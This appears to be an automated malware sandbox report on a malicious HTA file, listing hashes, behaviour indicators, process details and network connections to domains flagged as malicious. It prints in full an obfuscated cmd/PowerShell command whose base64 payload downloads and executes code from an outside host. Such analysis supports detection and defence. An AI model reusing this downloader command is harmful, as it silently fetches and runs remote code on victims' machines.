analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

CEA.hta

Full analysis: https://app.any.run/tasks/fc72665b-8555-499d-837f-8ca75e6fa51a
Verdict: Malicious activity
Analysis date: June 18, 2019, 20:42:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/html
File info: HTML document, Non-ISO extended-ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

16ECBF1E31675EE56AE315CECF198B33

SHA1:

0B653892795B3382E13B7382AE0F3B03F7163275

SHA256:

B078B7E3BF70BC48A93BC48038B88971D675297335C00F763D89395A14A7E40E

SSDEEP:

768:K++7jMLIWTWLt5iW8WWIWQxMb8pjjaHVZJIFBwRs6JCjRKz/:yML1tmjaJa6Rsfsz/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3408)
    • Starts CMD.EXE for commands execution

      • iexplore.exe (PID: 3404)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3408)
    • Creates files in the user directory

      • powershell.exe (PID: 2332)
  • INFO

    • Reads internet explorer settings

      • iexplore.exe (PID: 3404)
    • Application launched itself

      • iexplore.exe (PID: 2944)
    • Changes internet zones settings

      • iexplore.exe (PID: 2944)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2944)
      • iexplore.exe (PID: 3404)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.html | HyperText Markup Language (100)

EXIF

HTML

Generator: Microsoft Word 15 (filtered)
ContentType: text/html; charset=windows-1252
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
5
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe cmd.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2944"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\CEA.hta.htmlC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3404"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2944 CREDAT:79873C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3408"C:\Windows\System32\cmd.exe" /c ECHO IEX([string]([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String({SQBFAFgAKAAoAFsAcgBlAGcAZQB4AF0AOgA6AE0AYQB0AGMAaABlAHMAKAAiAHMAZQAkACAAWQBVADsAMAA1ACAAcABlAGUAbABzADsAKQAnAGwAYQB1AHQAcgBpAHYALwB0AGMAYQB0AG4AbwBjAC8AdABlAG4ALgB0AG4AdQBvAGMAYwBhAHAAdQBrAGMAYQBiAC8ALwA6AHMAcAB0AHQAaAAnACgAZwBuAGkAcgB0AFMAZABhAG8AbABuAHcAbwBEAC4AcQBkACQAPQBzAGUAJAA7ACkAMAA3ACAAeABhAE0ALQAgACAAbQBvAGQAbgBhAFIALQB0AGUARwAoACAAcABlAGUAbABzADsAKQAnADcAPwBsACEAdgBCAEsAOgB5AEMAKwBkACwAdAB8AGUAeABeAGgAMABpADIAfQAxAHUAWQB7AGsASABMAEkAagAnACAALAAnAGgAdAB1AGEAJwAoAGwAYQBpAHQAbgBlAGQAZQByAEMAawByAG8AdwB0AGUATgAuAHQAZQBOAC4AbQBlAHQAcwB5AFMAIAB0AGMAZQBqAGIAbwAtAHcAZQBuACAAPQAgAHMAbABhAGkAdABuAGUAZABlAHIAQwAuAHEAZAAkACAAOwB0AG4AZQBpAGwAQwBiAGUAVwAuAHQAZQBOAC4AbQBlAHQAcwB5AFMAIAB0AGMAZQBqAGIAbwAtAHcAZQBuACAAPQAgAHEAZAAkACAAOwB9ACAAZQB1AHIAdAAkACAAewAgAD0AIABrAGMAYQBiAGwAbABhAEMAbgBvAGkAdABhAGQAaQBsAGEAVgBlAHQAYQBjAGkAZgBpAHQAcgBlAEMAcgBlAHYAcgBlAFMAOgA6AF0AcgBlAGcAYQBuAGEATQB0AG4AaQBvAFAAZQBjAGkAdgByAGUAUwAuAHQAZQBOAC4AbQBlAHQAcwB5AFMAWwA7ACcAbgBvAEkAcwBTAGUAcgBwAFgAZQAtAGUAawBvAFYAbgBJACcAIABlAHUAbABhAFYALQAgAFkAVQAgAHMAYQBpAGwAQQAtAHQAZQBTACIALAAnAC4AJwAsACcAUgBpAGcAaAB0AFQAbwBMAGUAZgB0ACcAKQAgAHwAIAAlAHsAJABfAC4AdgBhAGwAdQBlAH0AKQAgAC0AagBvAGkAbgAgACcAJwApAA==}))));Exit | PowerShell -C:\Windows\System32\cmd.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2096C:\Windows\system32\cmd.exe /S /D /c" ECHO IEX([string]([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String({SQBFAFgAKAAoAFsAcgBlAGcAZQB4AF0AOgA6AE0AYQB0AGMAaABlAHMAKAAiAHMAZQAkACAAWQBVADsAMAA1ACAAcABlAGUAbABzADsAKQAnAGwAYQB1AHQAcgBpAHYALwB0AGMAYQB0AG4AbwBjAC8AdABlAG4ALgB0AG4AdQBvAGMAYwBhAHAAdQBrAGMAYQBiAC8ALwA6AHMAcAB0AHQAaAAnACgAZwBuAGkAcgB0AFMAZABhAG8AbABuAHcAbwBEAC4AcQBkACQAPQBzAGUAJAA7ACkAMAA3ACAAeABhAE0ALQAgACAAbQBvAGQAbgBhAFIALQB0AGUARwAoACAAcABlAGUAbABzADsAKQAnADcAPwBsACEAdgBCAEsAOgB5AEMAKwBkACwAdAB8AGUAeABeAGgAMABpADIAfQAxAHUAWQB7AGsASABMAEkAagAnACAALAAnAGgAdAB1AGEAJwAoAGwAYQBpAHQAbgBlAGQAZQByAEMAawByAG8AdwB0AGUATgAuAHQAZQBOAC4AbQBlAHQAcwB5AFMAIAB0AGMAZQBqAGIAbwAtAHcAZQBuACAAPQAgAHMAbABhAGkAdABuAGUAZABlAHIAQwAuAHEAZAAkACAAOwB0AG4AZQBpAGwAQwBiAGUAVwAuAHQAZQBOAC4AbQBlAHQAcwB5AFMAIAB0AGMAZQBqAGIAbwAtAHcAZQBuACAAPQAgAHEAZAAkACAAOwB9ACAAZQB1AHIAdAAkACAAewAgAD0AIABrAGMAYQBiAGwAbABhAEMAbgBvAGkAdABhAGQAaQBsAGEAVgBlAHQAYQBjAGkAZgBpAHQAcgBlAEMAcgBlAHYAcgBlAFMAOgA6AF0AcgBlAGcAYQBuAGEATQB0AG4AaQBvAFAAZQBjAGkAdgByAGUAUwAuAHQAZQBOAC4AbQBlAHQAcwB5AFMAWwA7ACcAbgBvAEkAcwBTAGUAcgBwAFgAZQAtAGUAawBvAFYAbgBJACcAIABlAHUAbABhAFYALQAgAFkAVQAgAHMAYQBpAGwAQQAtAHQAZQBTACIALAAnAC4AJwAsACcAUgBpAGcAaAB0AFQAbwBMAGUAZgB0ACcAKQAgAHwAIAAlAHsAJABfAC4AdgBhAGwAdQBlAH0AKQAgAC0AagBvAGkAbgAgACcAJwApAA==}))));Exit "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2332PowerShell -C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
615
Read events
479
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
1

Dropped files

PID
Process
Filename
Type
2944iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
2944iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2332powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NQP4YG9C9SMVTRYFN0XA.temp
MD5:
SHA256:
2332powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF125164.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2332powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
3404iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019061820190619\index.datdat
MD5:600B6872694E93ECA06245F08F840C8B
SHA256:2189EC845170FF3BDC755D7A8C62CF0A97F3265CA3945C5856BD07C5C618B842
2944iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].pngimage
MD5:9FB559A691078558E77D6848202F6541
SHA256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
2944iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Feeds Cache\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
11
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2944
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
91.216.163.90:443
whiteelection.com
Informacines sistemos ir technologijos, UAB
LT
malicious
2944
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3404
iexplore.exe
91.216.163.90:443
whiteelection.com
Informacines sistemos ir technologijos, UAB
LT
malicious
2332
powershell.exe
213.227.154.22:443
backupaccount.net
LeaseWeb Netherlands B.V.
NL
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
whiteelection.com
  • 91.216.163.90
malicious
backupaccount.net
  • 213.227.154.22
malicious

Threats

No threats detected
No debug info